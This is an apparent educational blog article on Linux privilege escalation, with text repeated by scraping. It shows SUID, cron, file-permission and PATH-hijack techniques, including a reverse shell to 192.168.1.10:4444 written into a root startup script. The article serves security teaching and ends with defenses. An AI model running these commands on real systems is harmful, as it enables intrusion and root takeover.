One of the most risky and most frequently used bugs is a privilege escalation vulnerability. It sounds like a mouthful, but in all honesty, the idea is very straightforward—and it's something you really should know about if you're interested in computer security. Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide Prefer watching instead of reading? Here’s a quick video guide https://youtu.be/cTtewIHKUUI?embedable=true https://youtu.be/cTtewIHKUUI?embedable=true What is Privilege Escalation? Imagine a computer system as a building. Not everyone has access to all rooms. A janitor can access cleaning closets, but the CEO possesses keys to the executive office. Similarly, computer users possess various levels of access—also referred to as privileges. Normal users can access things such as browsing the web or using software.
Administrators (or root users) can install programs, modify system settings, and read sensitive files. Normal users can access things such as browsing the web or using software. Administrators (or root users) can install programs, modify system settings, and read sensitive files. Privilege escalation occurs when a user achieves greater access than they should. For instance, if a normal user deceives the system into providing them with administrator privileges, they can now execute activities they never had permission to perform. Why is it Threatening? When an attacker obtains admin privileges by exploiting a weakness, they can: Install malware
Steal or delete sensitive information
Change security settings
Open backdoors for subsequent attacks Install malware Steal or delete sensitive information Change security settings Open backdoors for subsequent attacks In essence, they can completely control the system. Types of Privilege Escalation Vertical Privilege Escalation: This is when an attacker climbs the ladder of access—from a regular user to an admin. This is the most risky type because it grants attackers complete control.
Horizontal Privilege Escalation: This is when an attacker remains at the same level of access but reaches someone else's information or resources. For instance, a standard user looking at another user's confidential files. Vertical Privilege Escalation: This is when an attacker climbs the ladder of access—from a regular user to an admin. This is the most risky type because it grants attackers complete control. Horizontal Privilege Escalation: This is when an attacker remains at the same level of access but reaches someone else's information or resources. For instance, a standard user looking at another user's confidential files. Common Exploitation Techniques SUID Binaries on Linux: SUID means a program runs with the permission of the file owner, not the user who runs it. If misconfigured, it can lead to root access. Check for SUID binaries: # Input Command
find / -perm -4000 -type f 2>/dev/null

# Output Example
-rwsr-xr-x 1 root root 133K Jan 15 2024 /usr/bin/vulnerable-bin # Input Command
find / -perm -4000 -type f 2>/dev/null

# Output Example
-rwsr-xr-x 1 root root 133K Jan 15 2024 /usr/bin/vulnerable-bin Exploit vulnerable C binary: // vulnerable-bin.c
#include <stdlib.h>

int main() {
   system("/bin/sh"); // runs shell with root privilege
   return 0;
} // vulnerable-bin.c
#include <stdlib.h>

int main() {
   system("/bin/sh"); // runs shell with root privilege
   return 0;
} If compiled and given SUID root: gcc vulnerable-bin.c -o vulnerable-bin
chmod u+s vulnerable-bin gcc vulnerable-bin.c -o vulnerable-bin
chmod u+s vulnerable-bin Running this as a user: ./vulnerable-bin
# Now you’re root inside the shell! ./vulnerable-bin
# Now you’re root inside the shell! Cron Job Abuse: Admins often schedule tasks using cron. If misconfigured, it can run attacker’s code as root. Input Command

ls -l /etc/cron.d/customjob

Output Example

root /tmp/myscript.sh Input Command

ls -l /etc/cron.d/customjob

Output Example

root /tmp/myscript.sh If /tmp/myscript.sh is writable: echo "/bin/bash" > /tmp/myscript.sh
chmod +x /tmp/myscript.sh echo "/bin/bash" > /tmp/myscript.sh
chmod +x /tmp/myscript.sh Now you’re root! Weak File Permissions: Sensitive files with weak permissions can be overwritten. Input Command

ls -l /usr/local/bin/startup.sh

Output Example

-rw-rw-rw- 1 root root 124 Jan 1 00:00 /usr/local/bin/startup.sh Input Command

ls -l /usr/local/bin/startup.sh

Output Example

-rw-rw-rw- 1 root root 124 Jan 1 00:00 /usr/local/bin/startup.sh Now inject your payload echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /usr/local/bin/startup.sh echo "bash -i >& /dev/tcp/192.168.1.10/4444 0>&1" > /usr/local/bin/startup.sh PATH Environment Variable Exploit: Some scripts run system tools like cp, ls, cat — but don’t use full paths. #!/bin/bash cp /etc/passwd /tmp/backup #!/bin/bash cp /etc/passwd /tmp/backup If cp is not given a full path (/bin/cp), attacker can trick it. Create fake cp echo '#!/bin/bash' > /tmp/cp
echo 'bash' >> /tmp/cp
chmod +x /tmp/cp echo '#!/bin/bash' > /tmp/cp
echo 'bash' >> /tmp/cp
chmod +x /tmp/cp Hijack PATH export PATH=/tmp:$PATH
./vulnerable-script.sh export PATH=/tmp:$PATH
./vulnerable-script.sh How Does Privilege Escalation Occur? Attackers frequently employ one of the following: Exploiting software bugs: A poorly constructed program may by accident provide excess access to users.
Misconfigured systems: Occasionally, systems are configured so that they are at risk, such as granting unwarranted permissions.
Password weaknesses: If admin passwords are weak or stored in an insecure manner, attackers can break them.
Insecure scripts or services: Scripts that execute with elevated privileges can be exploited if not secured properly. Exploiting software bugs: A poorly constructed program may by accident provide excess access to users. Misconfigured systems: Occasionally, systems are configured so that they are at risk, such as granting unwarranted permissions. Password weaknesses: If admin passwords are weak or stored in an insecure manner, attackers can break them. Insecure scripts or services: Scripts that execute with elevated privileges can be exploited if not secured properly. Real-World Example In 2021, a bug in the Linux pkexec tool (PwnKit) permitted local users to elevate to root privileges. The tool was meant to execute commands safely as another user, but since there was a bug, it was possible for anyone to exploit it to attain admin rights without a password. Preventing Privilege Escalation Several steps can be taken by individuals and organizations: Implement patches and updates regularly
Apply the principle of least privilege: Grant access to users only where they need it
Audit permissions to identify over-privileged accounts
Look at logs for anomalous behavior
Implement security technologies such as antivirus, endpoint security, and SIEM systems Implement patches and updates regularly Apply the principle of least privilege: Grant access to users only where they need it Audit permissions to identify over-privileged accounts Look at logs for anomalous behavior Implement security technologies such as antivirus, endpoint security, and SIEM systems Final Thoughts Privilege escalation flaws are like open doors in a fortified building. If all else is locked up, one open door can provide an attacker with complete authority. This is why finding and correcting these weaknesses is of utmost concern to cybersecurity experts.

How Hackers Climb the Ladder: Privilege Escalation Exploits, Explained

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

A Beginner’s Guide to Reconnaissance in PenTesting

Windows Sticky Keys Exploit: The War Veteran That Never Dies

06/02/2018: Biggest Stories in the Cryptosphere

0-Days are on the Rise and that Means a Lot More Work for SOC Teams

Time Bombs Inside Software: 0-Day Log4Shell is Just the Tip of The Iceberg

The Noonification: How the Liver Transplant System Changed Forever (11/25/2023)

A Beginner’s Guide to Reconnaissance in PenTesting

Windows Sticky Keys Exploit: The War Veteran That Never Dies

06/02/2018: Biggest Stories in the Cryptosphere

0-Days are on the Rise and that Means a Lot More Work for SOC Teams

Time Bombs Inside Software: 0-Day Log4Shell is Just the Tip of The Iceberg

The Noonification: How the Liver Transplant System Changed Forever (11/25/2023)

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps